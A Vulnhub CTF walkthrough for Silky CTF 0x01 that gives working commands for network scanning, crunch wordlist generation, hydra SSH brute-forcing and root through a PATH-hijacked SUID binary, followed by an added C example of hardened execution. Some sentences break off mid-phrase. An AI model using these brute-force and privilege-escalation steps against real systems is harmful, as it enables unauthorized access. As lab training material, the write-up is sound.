Today, we are going to pwn Silky CTF: 0x01 from Vulnhub.
- Host Discovery
- Nmap Scan of the machine
- Checking for disallowed entry in
- Password recovery
- SSH bruteforce of user silky
- Privilege Escalation
nmap -sn 192.168.43.0/24 will quickly give the list of live hosts, from which we can see our Silky machine's IP.
Starting with nmap, we run:
nmap -sV -sC -A 192.168.43.232
This command is very useful, as it provides a good amount of information on our host.
So, from the above nmap result we can see there's a note.txt on the server. Accessing that page gives German text, which translates to:
I absolutely have to remove the password from the page, after all, the last 2 characters are missing. But still.
So, one of the useful tools here is crunch, available on Kali Linux, so I used it to make a password file.
crunch 7 7 -t s1lKy^% > pass.txt
7 7 - Since we know that the password is 7 characters long, we use this to define that we need a minimum of 7 and a maximum of 7 characters.
-t - This tells crunch to treat s1lKy^% as a pattern rather than as a character set.
^% - This is used to specify that the second-to-last character is a symbol and the last one is a digit.
So, whenever it comes to brute-forcing, hydra comes to the rescue.
hydra -l silky -P pass.txt 192.168.43.232 ssh
So, trying our
find / -perm -u=s -type f 2>/dev/null gives an interesting binary executable file named
strings /usr/bin/sky reveals some information on how the binary works.
So, as we know it is using whoami, I did the following:
cd /tmp
echo "/bin/sh" > whoami
chmod 777 whoami
sky
Kaboom, we’re root now.
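For the defensive side of this escalation, here is an added example (not code from the original write-up, and not the source of sky) showing the pattern that makes a SUID binary hijackable next to a hardened form. It assumes the binary invokes whoami by bare name through a $PATH lookup, which the page implies but does not show; run_abs and run_sh are hypothetical helper names.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern (assumed, the page does not show sky's source):
 *     system("whoami");
 * A bare command name is resolved through the caller-controlled $PATH,
 * so a SUID-root binary runs whatever file is found there first. */

/* Hardened form: refuse anything but an absolute path, and exec it with a
 * fixed environment so the caller's PATH, LD_* and IFS never reach it.
 * Returns the child's exit status, or -1 on refusal or failure. */
int run_abs(const char *path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    int status;
    pid_t pid;

    if (path == NULL || path[0] != '/')
        return -1;                      /* no $PATH lookup, ever */

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, clean_env);  /* execve never consults $PATH */
        _exit(127);                     /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Demo helper: run a /bin/sh one-liner through run_abs(). */
int run_sh(const char *script)
{
    char *const argv[] = { "sh", "-c", (char *)script, NULL };
    return run_abs("/bin/sh", argv);
}

int main(void)
{
    setenv("PATH", "/tmp", 1);          /* constructed hostile PATH */
    if (run_abs("whoami", NULL) != -1)  /* bare name must be rejected */
        return 1;
    return run_sh("test \"$PATH\" = /usr/bin:/bin"); /* child sees fixed PATH */
}
```

A SUID helper that does not need root for the child command should also drop privileges (for example setuid(getuid())) before the exec.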
This was an easy Vulnhub machine and a great way to learn about generating custom passwords using